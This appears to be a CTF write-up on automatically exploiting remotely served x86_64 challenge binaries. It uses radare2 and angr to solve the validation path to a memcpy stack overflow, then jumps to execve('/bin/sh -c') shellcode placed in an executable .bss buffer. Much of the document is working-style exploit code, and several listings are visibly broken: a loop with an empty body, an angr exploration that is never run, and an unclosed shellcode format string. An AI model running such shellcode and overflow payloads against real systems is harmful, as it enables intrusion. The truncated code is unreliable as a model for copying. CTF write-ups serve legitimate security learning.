Hi there!

I guess you all know that feeling of having a working solution for a chall, which just fails to yield the flag in time during the ctf. Yep … the solution presented here is one of those cases. Nevertheless I wanted to do this writeup, since it’s a great opportunity to show some of the capabilities of angr and radare2.

Anyway, enough introductionary words, let’s get to the meat. The challenge only consisted of a remote service, which sends you a base64 encoded x86_64-binary once connected to it, and then waits for your input, which is supposed to exploit the freshly received binary.

Automating the process of retrieving the binary is quite straight forward:

from tasty import *
import base64
binary = 'x.out'
s = Socket(('',20002))

b64 = s.recv_until('\n\n\n')
b64 = b64.replace('\x0a','')

downloaded = base64.b64decode(b64)
f = open(binary,'w+')

After downloading a couple of binaries, it turns out that they all follow a certain structure, thus, the problem boils down to automated exploit generation for a well defined class of binaries. In essence, the binary consists of a loop inside the main function, parsing argv1 as hex-encoded input and storing it to a global buffer at 0x606080. Furthermore, a huge bunch of functions is present which are validating 4-bytes of the input at a time, apparently in an arbitrary order. If one check fails, the function returns and the program will be terminated. Thus, all those functions can be interpreted as a binary tree, where all leaves are either the next function or (simplified) an exit().

All the way down in this tree is always a function with a memcpy, which copies tons of bytes from the global-buffer onto the stack, effectively giving us control over the saved return address.

Consequently, it should be our target to get all the way down to the memcpy to take over control. While angr itself might have been able to symbolically explore the binary until the memcpy all alone, I decided to go another way, to speed up the creation of inputs triggering the desired path, due to the following reasons:

  1. I was expecting a timeout on the remote connection (as it turned out, this wasn’t a problem)

  2. I didn’t know whether we have to exploit more than one challenge

  3. I noticed that every input byte is only validated once

Thus, the general plan was to use radare for reconstructing the function tree and then use angr to find the right inputs to the individual functions. Since r2pipe offers great scriptability for radare and I didn’t feel like playing with angr.analyses.CFG, I obtained the desired path through the function tree with the following lines of code:

import r2pipe, re

r2 = r2pipe.open(binary)
r2.cmd('aaa') #analyze the binary

#a bunch of regexes for finding different stuff in the disassembly
call_re = re.compile('call fcn.([0-9a-fA-F]{8})')
ret_re = re.compile('(0x[0-9a-fA-F]{8})\s+.+\s+ret')
addr_re = re.compile('\[(0x60[0-9a-fA-F]{4}):1\]')
memcpy_re= re.compile('(0x[0-9a-fA-F]{8})\s+.+\s+call sub.memcpy')

to_find = [] #array of (ordered) target functions
to_avoid = [] #to simplify our life, let's avoid all basic-blocks leading to a ret
byte_addresses  = [] #we need this to keep track of the actually validated input-bytes' locations

addr = 'main' 
while True:
    disas= r2.cmd('pdf @ %s'% addr) #disassemble function @ addr

    m = re.search(call_re,disas)
    if m:
        addr = '0x'+m.group(1)
        print '[+] Found a target %s' % addr

    m = re.search(ret_re,disas)
    if m:
        ret = m.group(1)
        print '[+] Found avoid %s' % ret

    mi = re.finditer(addr_re,disas)
    address_local = []
    for m in mi:

    m = re.search(memcpy_re,disas)
    if m:
        addr = m.group(1)
        print '[+] Found target %s' % addr

Besides the actual addresses of functions we want to reach, we also save the addresses of the processed input-bytes, in order to construct the right input later on, and the addresses of basic blocks we want to avoid.

The next step is to use angr and systematically solve the correct input to every function. Hereby, we are initiating a new state for every function, mark its inputs (saved in rdi, rsi, rdx and rcx) as symbolic and explore to the desired target, which is always the next address in our to_find array. Unfortunately, sometimes angr is not able to solve correctly for every function, some manual analyses suggested that appearingly not every binary is actually solvable. Thus, we need to check whether we were able to reach the desired function, and if not, we exit our script.

import angr,claripy

p = angr.Project(binary)
results = {}
#since some of the inputs byte are not validated at all, let's populate results with dummy bytes
for i in range(0x606080,0x606080+500):
    results[i] = 0xff

for i in range(0,len(to_find)-1):
    f = to_find[i]
    t = to_find[i+1]
    print 'Exploring from %08x to 0x%08x' % (f,t)

    #Set up the state for the function we want to solve
    e = p.factory.entry_state(addr=f)
    rdi = claripy.BVS('rdi', 64)
    rsi = claripy.BVS('rsi', 64)
    rdx = claripy.BVS('rdx', 64)
    rcx = claripy.BVS('rcx', 64)
    e.regs.rdi = rdi
    e.regs.rsi = rsi
    e.regs.rdx = rdx
    e.regs.rcx = rcx

    #Generate a path_group out of this state and explore
    pg = p.factory.path_group(e)
    if len(pg.found) == 0:
        print "[-] OH NOEZ"

    #Save the solutions
    found = pg.found[0]
    address_local = byte_addresses[i]
    results[address_local[3]] = found.state.se.any_int(rdi)
    results[address_local[2]] = found.state.se.any_int(rsi)
    results[address_local[1]] = found.state.se.any_int(rdx)
    results[address_local[0]] = found.state.se.any_int(rcx)

Alright, now we are able to find an input triggering the vulnerable path of a binary given by the service. The last step is the construction of the payload. Luckily, the binaries are compiled with -z execstack, which marks also the .bss section as executable. This is great news, since we can simply put shellcode inside the global buffer and jump there. Big kudos to immerse here for scripting up the payload-generation code, while I was busy to write exploration code.

def gen_input(results):
    #let's strip the dummy bytes away
    i = 0x606080+len(results)-1
    while results[i] == 0xff:
        i -=1

    res = ''
    for i in results:
        res += "%02x" % results[i]
    return res

command = "pwd; ls;"
payload_addr = 0x6061ce #this address is static in all binaries

shellcode = assemble("""
; set up argv[]
xor rax, rax
push rax
mov rax, 0x%x
push rax
mov rax, 0x%x
push rax
mov rax, 0x%x
push rax

; do the syscall
mov rsi, rsp
mov rdi, rax
xor rdx, rdx
mov rax, 59

""" % (
payload_addr + 0x18 +   8,
payload_addr + 0x18 + 8 + 0x30 + 8,
payload_addr + 0x18 + 8 + 0x30,

command += "\x00"
command += "A"*(0x30 - len(command))
assert len(command) == 0x30
command += "/bin/sh\x00"
command += "-c" + "\x00"*6

path = gen_input(results)
payload = "A"*0x22  #the padding is static as well
payload += pq(payload_addr + 0x20 + 0x30 + 0x10)
payload += command
payload += shellcode

payload = payload.encode('hex')
payload = path + payload


#Save payload for local testing
f = open("payload", "w")

Although the resulting script from the above pieces is technically working, there were several problems, resulting in the need to fire that script tons of time in a while loop. First and foremost, not all binaries appeared to be solvable with the presented method. Additionally the generated exploit-code failed quite often on remote, but worked reliable locally - which was quite frustrating. Nevertheless, after running the script a lot we eventually got some output indicating that we are currently in /tmp. From here, we could go on, locate and cat the flag, which turned out to be in /home/mbrainfuzz/.

Unfortunately, we were not able to figure the location of the flag file in time, and thus, couldn’t retrieve the points for it. Nevertheless, it was still nice to utilize r2 and angr at the same time and I hope, you enjoyed reading this writeup.